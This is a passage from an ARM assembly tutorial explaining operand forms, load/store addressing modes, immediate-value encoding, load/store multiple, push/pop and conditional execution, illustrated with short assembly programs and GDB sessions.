    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 = n = 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 = n = 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 = n = 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 = n = 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend

    As a quick example of how different kind of instructions look like, let’s take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is how it would look like in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
     0x00008084 <+16>:     bx   lr
    End of assembler dump.

    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the compiler calculated the location of our values specified in the Literal Pool (PC+12).  You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-intexed. Load the value at memory address found in R1 to register R3 (not R3 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, compile it and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address, then updated with the offset calculated with R1+4. In other words, it takes the value found in R1 (not R1+4), which is 0x100A0 and loads it into R3, then updates R1 to R1 (0x100A0) + offset (#4) =  0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into the register R2, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is an immediate offset (or a register containing an immediate value) left/right shifted (<shifter>) to scale the immediate. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be for loops to iterate over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modifiy base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

    The second STR operation uses the pre-indexed address mode. This means, it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it will first store the value found at the memory address R1 (0x1009c) + the offset left shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and update R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716

    Summary

    Remember the three offset modes in LDR/STR:

    1. offset mode uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset mode uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset mode uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s prefix address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s postfix address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]
    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason why we sometimes need to use this syntax to move a 32-bit constant into a register in one instruction is because ARM can only load a 8-bit value in one go. What? To understand why, you need to know how immediate values are being handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32bit long, and all instructions are conditional. There are 16 condition codes which we can use and one condition code takes up 4 bits of the instruction. Then we need 2 bits for the destination register. 2 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcodes. The point here is, that after assigning bits to instruction-type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that the ARM instruction is only able to use a limited range of immediate values with MOV directly.  If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8bit number (n) being able to load any 8-bit value in the range of 0-255, and a 4bit rotation field (r) being a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte

    This has the consequence that it is not possible to load a full 32bit address in one go. We can bypass this restrictions by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511

    If you try to load an invalid immediate value the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.
    Let’s say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 in multiple parts or you use LDR as I described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256
    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 BYTES. This is important for understanding the offsetting. So the program consists of .data section where we allocate an empty array (array_buff) having 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array having 7 elements, another for “bridging” .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use ADR instruction (lazy approach) to get the address of the 4th (words[3]) element into the R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of word[3], which in this case is 0x80B8. This means, our array starts at the address of word[0]: 0x80AC (0x80B8 –  0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed by R0. So because we made R0 point to words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let’s perform the STM instruction to store multiple values to memory. The STM instruction in our code takes values (0x3 and 0x4) from registers R4 and R5 and stores these values to a memory location specified by R1. We previously set the R1 to point to the first array_buff element so after this operation the array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, the LDM and STM opperate on a step of a word (32 bits = 4 byte).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory address 0x100D0 and 0x100D4. The following instruction inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before). These variations differ by the way how they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get a sequential (forward) data loading from the memory address specified by the first operand (register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts we move backwards and load the words[3], words[2] and words[1] into R6, R5, R4. Yes, registers are also loaded backwards. So after the instruction finishes R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address AFTER each load. The backward registry loading happens because with every load we decrement the memory address and thus decrement the registry number to keep up with the logic that higher memory addresses relate to higher registry number. Check out the LDMIA (or LDM) example, we loaded lower registry first because the source address was lower, and then loaded the higher registry because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after.

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001
    PUSH AND POP

    There is a memory location within the process called Stack. The Stack Pointer (SP) is a register which, under normal circumstances, will always point to an address wihin the Stack’s memory region. Applications often use Stack for temporary data storage. And As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR / STR or their derivatives (LDM.. /STM..) are used for memory operations. In x86, we use PUSH and POP to load and store from and onto the Stack. In ARM, we can use these two instructions too:

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored to the new address pointed by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instuctions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp! reglist (see ARM Manual)

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are poped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001
    CONDITIONAL EXECUTION

    We already briefly touched the conditions’ topic while discussing the CPSR register. We use conditions for controlling the program’s flow during it’s runtime usually by making jumps (branches) or executing some instruction only when a condition is met. The condition is described as the state of a specific bit in the CPSR register. Those bits change from time to time based on the outcome of some instructions. For example, when we compare two numbers and they turn out to be equal, we trigger the Zero bit (Z = 1), because under the hood the following happens: a – b = 0. In this case we have EQual condition. If the first number was bigger, we would have a Greater Than condition and in the opposite case – Lower Than. There are more conditions, like Lower or Equal (LE), Greater or Equal (GE) and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. Negative bit get's set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above triggers Negative bit to be set (2 – 3 = -1) indicating that the value in r0 is Lower Than number 3. Subsequently, the ADDLT instruction is executed because LT condition is full filled when V != N (values of overflow and negative bits in the CPSR are different). Before we execute second CMP, our r0 = 3. That’s why second CMP clears out Negative bit (because 3 – 3 = 0, no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0 which results in LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions. Specifically, the Thumb version which allows conditional execution (Thumb-2). Some ARM processor versions support the “IT” instruction that allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same or logical inverse. This means that if you use ITE, the first and second instruction (If-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrates this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
